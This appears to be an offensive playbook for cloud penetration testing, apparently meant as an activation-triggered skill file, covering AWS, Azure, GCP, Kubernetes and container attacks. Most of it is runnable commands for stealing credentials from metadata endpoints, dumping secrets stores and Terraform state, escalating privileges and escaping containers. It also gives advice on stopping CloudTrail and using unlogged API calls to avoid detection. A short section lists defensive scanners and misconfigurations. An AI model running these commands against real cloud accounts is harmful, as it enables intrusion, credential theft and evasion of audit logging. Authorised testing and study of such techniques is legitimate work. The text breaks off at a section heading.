Cloud Security & Attack
When to Activate
- Cloud infrastructure penetration testing
- AWS/Azure/GCP privilege escalation
- Container and Kubernetes security assessment
- Serverless function exploitation
- IaC (Terraform/CloudFormation) security review
- Cloud credential abuse and lateral movement
AWS Attacks
Initial Enumeration
# Caller identity
aws sts get-caller-identity
# Account enumeration
aws iam list-users
aws iam list-roles
aws iam list-policies --only-attached
aws iam get-account-authorization-details # full dump
# S3 enumeration
aws s3 ls
aws s3 ls s3://bucket-name --recursive
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# EC2
aws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId,State.Name,PublicIpAddress,IamInstanceProfile.Arn]'
# Lambda
aws lambda list-functions
aws lambda get-function --function-name NAME # includes download link
aws lambda get-policy --function-name NAME
Privilege Escalation
# Pacu (automated AWS exploitation)
pacu
> import_keys --all
> run iam__enum_permissions
> run iam__privesc_scan
> run iam__bruteforce_permissions
# Common privesc paths:
# iam:CreatePolicyVersion → create admin policy version
# iam:SetDefaultPolicyVersion → activate old permissive version
# iam:AttachUserPolicy → attach AdministratorAccess
# iam:CreateLoginProfile → create console password for any user
# iam:UpdateLoginProfile → change any user's password
# iam:PassRole + lambda:CreateFunction → create Lambda with admin role
# iam:PassRole + ec2:RunInstances → launch EC2 with admin role
# sts:AssumeRole → assume cross-account admin role
# lambda:UpdateFunctionCode → inject code into existing Lambda
# SSRF to IMDS
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns: AccessKeyId, SecretAccessKey, Token
Post-Exploitation
# Secrets Manager / Parameter Store
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id NAME
aws ssm get-parameters-by-path --path "/" --recursive --with-decryption
# RDS snapshots (public)
aws rds describe-db-snapshots --snapshot-type public
# CloudTrail disruption (stealth)
aws cloudtrail describe-trails
aws cloudtrail stop-logging --name trail-name # LOUD but effective
# Better: use regions without CloudTrail, or use API calls that aren't logged
Azure Attacks
Enumeration
# Azure AD enumeration
az ad user list
az ad group list
az ad app list
az role assignment list --all
# Resource enumeration
az resource list
az vm list
az storage account list
az keyvault list
# Token from IMDS
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
Privilege Escalation
# Managed Identity abuse
# Any Azure resource with MI can request tokens for other services
# Automation Account RunAs
# Extract certificate → authenticate as service principal
# Key Vault access
az keyvault secret list --vault-name VAULT
az keyvault secret show --vault-name VAULT --name SECRET
# Azure AD Connect (on-prem sync)
# Extract credentials from ADSync database → DCSync
# Consent grant attack
# Illicit consent: trick admin into granting app permissions
# Application with Mail.Read, Files.ReadWrite.All
GCP Attacks
# Service account enumeration
gcloud iam service-accounts list
gcloud projects get-iam-policy PROJECT_ID
# Metadata server
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Privilege escalation
# iam.serviceAccountKeys.create → create key for any SA
# iam.serviceAccounts.actAs → impersonate service account
# compute.instances.setMetadata → add SSH key to any VM
# deploymentmanager.deployments.create → deploy as project editor
# Storage bucket enumeration
gsutil ls
gsutil ls gs://bucket-name
gsutil cp gs://bucket-name/secret.txt .
Kubernetes Attacks
Enumeration
# Check permissions
kubectl auth can-i --list
kubectl get secrets --all-namespaces
kubectl get pods --all-namespaces
# Service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Use with: kubectl --token=$TOKEN --server=https://kubernetes.default.svc
# API server direct
curl -k https://kubernetes.default.svc/api/v1/namespaces/default/secrets \
-H "Authorization: Bearer $TOKEN"
Exploitation
# Privileged pod escape
# If privileged: mount host filesystem
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# Pod with hostPID/hostNetwork
# Access host processes, network stack
# Writable hostPath mount
# Write to /etc/cron.d/ on host
# Peirates (k8s pentesting tool)
peirates
> get-secrets
> attack-mount-host-filesystem
Container Escape
# Docker socket mounted
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host
# Privileged container
mount /dev/sda1 /mnt
chroot /mnt
# CVE-based escapes
# CVE-2019-5736 (runc) — overwrite host runc binary
# CVE-2020-15257 (containerd) — abstract socket access
# CVE-2022-0185 — file_system_context heap overflow
IaC Security Review
Terraform Misconfigurations
# Dangerous patterns to flag:
# - Security groups with 0.0.0.0/0 ingress
# - S3 buckets without encryption or public access block
# - IAM policies with "*" actions/resources
# - RDS instances publicly accessible
# - CloudTrail logging disabled
# - KMS keys without rotation
# - Lambda functions with admin roles
Tools
# Automated scanning
prowler aws --severity critical high
scoutsuite aws
trivy config ./terraform/
checkov -d ./terraform/
tfsec ./terraform/
Advanced: AWS Exploitation Chains
IMDSv2 Bypass
# IMDSv2 requires PUT with hop limit=1 — bypass via SSRF in same host
# If SSRF target is on same EC2, hop limit doesn't decrement
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# DNS rebinding to bypass IMDSv2 hop limit from external SSRF
# Attacker DNS resolves to target IP first, then 169.254.169.254
# Browser/HTTP client reuses connection → bypasses hop limit
Lambda → IAM Role Chaining
# Lambda function with iam:PassRole + lambda:CreateFunction
# Create new Lambda with more privileged role
aws lambda create-function \
--function-name escalate \
--runtime python3.11 \
--role arn:aws:iam::ACCOUNT:role/AdminRole \
--handler index.handler \
--zip-file fileb://payload.zip
# Lambda → STS → Cross-account assume
aws sts assume-role --role-arn arn:aws:iam::TARGET_ACCOUNT:role/CrossAccountRole \
--role-session-name pwned
S3 Confused Deputy
# Service principal confused deputy via s3:PutBucketPolicy
# Trick AWS service into accessing bucket on your behalf
# Exploit: create bucket with same name as expected by service
# Service writes sensitive data to attacker-controlled bucket
# S3 bucket takeover via dangling CNAME
# 1. Find CNAME pointing to deleted S3 bucket
# 2. Create bucket with same name in any region
# 3. Serve malicious content on victim's subdomain
dig +short subdomain.target.com CNAME
# Returns: target-bucket.s3.amazonaws.com (NoSuchBucket)
aws s3 mb s3://target-bucket
CloudFormation/Terraform State Exploitation
# Terraform state file contains all secrets in plaintext
aws s3 cp s3://terraform-state-bucket/prod/terraform.tfstate .
cat terraform.tfstate | jq '.resources[].instances[].attributes | select(.password != null)'
# CloudFormation exports (cross-stack references)
aws cloudformation list-exports
# Often contains VPC IDs, subnet IDs, security group IDs, RDS endpoints
Cognito Identity Pool Misconfiguration
